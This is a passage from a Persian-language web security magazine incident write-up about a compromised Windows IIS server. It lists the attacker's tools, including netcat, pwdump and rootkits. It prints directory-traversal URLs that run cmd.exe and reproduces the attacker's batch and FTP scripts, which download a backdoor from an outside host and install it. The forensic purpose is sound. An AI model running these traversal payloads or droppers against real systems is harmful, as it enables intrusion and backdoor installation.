‫ﻣﺸﻬﻮﺭ ﻭ ﻗﺪﺭﺗﻤﻨﺪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪.‬‬
‫• ‪ : VNCHooks.dll‬ﺩﻭﻣﻴﻦ ﻓﺎﻳﻞ ﺑﺮﺍﻱ ﻧﺼﺐ ‪.VNC‬‬
‫• ‪ : Vnsystask.exe‬ﺳﻮﻣﻴﻦ ﻓﺎﻳﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﺑﺮﻧﺎﻣﻪ ‪ VNC‬ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ﻭ ﻫﻤﻪ‬
‫ﺍﻳﻨﻬﺎ ﺍﺯ ﺩﻳﺪ ﻛﺎﺑﺮ ﭘﻨﻬﺎﻥ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫• ‪ ، Netcat : Nc.exe‬ﺑﺮﻧﺎﻣﻪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺩﺳﺘﻮﺭﺍﺕ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪.‬‬
‫• ‪ : Pw.exe‬ﻣﻌﻤﻮﻻ ﺑﻪ ﺍﺳﻢ ‪ pwdump(2).exe‬ﻣﺸﻬﻮﺭ ﺍﺳﺖ‪ .‬ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺮﺍﺝ‬
‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﻛﻠﻤﺎﺕ ﺭﻣﺰ ﺁﻧﻬﺎ‪.‬‬
‫• ‪ : Samdump.dll‬ﻓﺎﻳﻠﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﻧﺎﻣﻪ ‪ pw.exe‬ﻣﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﻪ ﺻﻮﺭﺕ ﻭﺍﺿﺢ ‪ ،‬ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﺭ ﻧﻪ ﻳﻜﻲ ‪ ،‬ﺑﻠﻜﻪ ‪ ٢‬ﻋﺪﺩ ‪ rootkit‬ﺩﺭ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ‬
‫‪ c:\winnt\system32‬ﻧﺼﺐ ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﻭ ﺁﻧﻄﻮﺭ ﻛﻪ ﻣﻦ ﺑﻌﺪﻫﺎ ﻓﻬﻤﻴﺪﻡ ﺍﻳﻦ ﺗﻨﻬﺎ ﻳﻜﻲ ﺍﺯ‬
‫ﺩﻫﻬﺎ ‪ rootkit‬ﺍﻱ ﺑﻮﺩ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﺭ ﺑﺮﺍﻱ ﺑﻪ ﺩﺳﺖ ﮔﺮﻓﺘﻦ ﺳﺮﻭﺭ ﺑﺎ ﻫﻢ ﺭﻗﺎﺑﺖ ﻣﻲ‬
‫ﻛﺮﺩﻧﺪ!!!‬
‫ﻣﺜﻼ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ‪ SysStat‬ﻛﻪ ﺩﺭ ﺩﺍﺧﻞ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ‪ c:\winnt\system32‬ﻗﺮﺍﺭ ﺩﺍﺷﺖ ﺩﺭ‬
‫ﺗﺎﺭﻳﺦ ‪ ٧‬ﺍﻛﺘﺒﺮ ﺳﺎﻝ ‪ ٢٠٠٢‬ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﺷﺎﻣﻞ ﻳﻚ ‪ rootkit‬ﺩﻳﮕﺮ ﺑﻮﺩ‪.‬‬
‫ﺑﻌﺪ ‪ ،‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺒﻴﻨﻢ ﺩﺭ ﺩﺭﺍﻳﻮ ﺭﻳﺸﻪ ﺳﺮﻭﺭ ‪ ،‬ﻓﺎﻳﻞ ﺩﻳﮕﺮﻱ ﻧﻈﺮﻡ ﺭﺍ ﺟﻠﺐ ﻣﻲ ﻛﻨﺪ ﻳﺎ ﻧﻪ ﺍﺯ‬
‫‪ URL‬ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﺩﺭﺍﻳﻮ ‪ C‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻡ ‪ .‬ﻓﻜﺮ ﻛﻨﻢ ﺧﻮﺩ ﺷﻤﺎ ﺑﺎ ﻛﻤﻲ ﻓﺮﺍﺳﺖ‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﺣﺪﺱ ﺑﺰﻧﻴﺪ ﺍﺯ ﭼﻪ ‪ URL‬ﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻡ ‪:‬‬
‫]‪http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/[ccc‬‬
‫\‪cmd.exe?c+dir+c:‬‬

‫‪4‬‬ ‫‪www.websecuritymgz.com‬‬
‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ ﺳﺮﻭﺭ‬C ‫ﻟﻴﺴﺖ ﺩﺭﺍﻳﻮ‬


Volume in drive C has no label ‫ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﻮﺩ ﻛﻪ ﻣﻦ ﺧﻨﺪﻡ ﮔﺮﻓﺖ ﺍﺯ‬
Volume Serial Number is DCF0-5460
Directory of C: ‫ﺍﻳﻨﻜﻪ ﺷﺮﻭﻉ ﻛﺮﺩﻩ ﺑﻮﺩﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﭼﻪ‬
10/10/02 01:03 p 1000,000 1mb
٠٥/٢٠/٠٢ ٠٩:٣٢a 0 ‫ ﺍﻣﺎ ﺩﻭ‬.‫ﻧﺎﺣﻴﻪ ﺍﻱ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‬
AUTOEXEC.BAT ‫ﻓﺎﻳﻞ ﺩﺭ ﺩﺭﺍﻳﻮ ﺭﻳﺸﻪ ﺑﻮﺩ ﻛﻪ ﻧﻈﺮﻡ‬
10/18/02 12:57a 789 bootobc.dll
10/10/02 12:42p 223 CDIR.TXT Script.bat , :‫ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ‬
05/20/02 09:32a 0 CONFIG.SYS ‫ ﻛﻪ ﺧﻴﻠﻲ ﺗﺎﺑﻠﻮ ﻧﺸﺎﻥ‬Script.txt
10/30/02 05:53p 0 dir.txt
11/23/99 10:04a 208,144 dns.exe ‫ﻣﻲ ﺩﺍﺩ ﻛﻪ» ﻣﻦ ﺗﻮﺳﻂ ﻳﻚ ﻧﻔﻮﺫﮔﺮ‬
06/07/02 11:04a 524,288
errorlog.evt ‫ ﻣﻦ ﺗﺼﻤﻴﻢ‬. «‫ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺍﻡ‬
05/28/02 07:06p <DIR> exchsrvr ‫ﮔﺮﻓﺘﻢ ﻛﻪ ﻣﺤﺘﻮﺍﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ‬
10/04/02 06:38p 0 explorer.exe
10/04/02 06:38p 0 explorer.ini URL ‫ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ‬. ‫ﻛﻨﻢ‬
05/20/02 10:18p <DIR> hpfonts
09/24/02 06:49p <DIR> hplj2100 ‫ﻫﺎﻱ ﺯﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻡ ﻛﻪ ﻣﺤﺘﻮﺍﻱ‬
09/29/02 01:03p 6,721,536
:‫ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻧﻤﺎﻳﺶ ﻣﻲ ﺩﻫﺪ‬
httpodbc.dll
09/27/02 09:36p <DIR> IIStmp http://192.168.0.66/MSADC/..%
10/18/02 01:11a <DIR> InetPub 5c..%5c..%5c..%5cwinnt/system
10/10/02 12:45p 6,656 32/[ccc]
INFUSE.EXE cmd.exe, /c+type+c:\scripts.bat
10/10/02 12:43p 602 LOGIN.TXT
10/02/02 02:17p 59,392 ncx99.exe http://192.168.0.66/MSADC/..%
10/30/02 02:47p 6,693 netstat.txt 5c..%5c..%5c..%5cwinnt/system
10/30/02 10:09a 536,870,912 32/[ccc]
pagefile.sys cmd.exe, /c+type+c:\scripts.txt
07/24/02 01:29p <DIR> Program Files
10/10/02 12:44p 81 pt.txt ‫ﺷﻤﺎ ﻫﻢ ﻳﻚ ﻧﮕﺎﻫﻲ ﺑﻪ ﻣﺤﺘﻮﺍﻱ ﺍﻳﻦ‬
10/14/02 05:21a 1,307 ra_slave.log
10/26/02 01:21p 716 Script.bat ‫ ﭼﻪ ﻧﺘﻴﺠﻪ ﺍﻱ ﻣﻲ‬. ‫ﻓﺎﻳﻠﻬﺎ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‬
10/26/02 01:21p 95 Script.txt
10/29/02 07:42p 1,949 ‫ﮔﻴﺮﺩ ؟ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺩﺭ ﺳﺮﻭﺭ ﺍﻓﺘﺎﺩﻩ؟‬
servudaemon.ini ‫ﺑﻪ ﻧﻈﺮ ﺷﻤﺎ ﺩﺭ ﻗﺪﻡ ﺑﻌﺪﻱ ﭼﻪ‬
10/28/02 04:40p 528
ServUStartUpLog.txt ‫ﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺑﺪﻫﻢ؟‬
10/04/02 04:25p 15,000,000
SR.CD2-H2O.r41
09/28/02 01:33p <DIR> TEMP
10/10/02 12:43p 17,920
TLIST.EXE
06/18/02 10:00p <DIR> veritas
09/28/02 01:18p <DIR> WIN32
10/10/02 12:45p 496,836
WINMGNT.EXE
10/30/02 01:09p <DIR> WINNT
35 File(s) 560,918,667 bytes

5 www.websecuritymgz.com
‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

Script.bat ‫ﻣﺤﺘﻮﺍﻱ ﻓﺎﻳﻞ‬


Mkdir c:\recycler
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash\[ccc]
old_files
Mkdir d:\recycler
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash\[ccc]
old_files
mkdir e:\recycler
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784
c:\winnt\system32\ftp -n -s:script.txt
c:\winnt\system32\svhost.exe /i
c:\winnt\system32\psshutdown.exe -r -l –f

Script.txt ‫ﻣﺤﺘﻮﺍﻱ ﻓﺎﻳﻞ‬


open 210.171.xxx.xxx:11515
USER ironfredh
hichic
get svhost.exe
get servudaemon.ini
quit

6 www.websecuritymgz.com

You might also like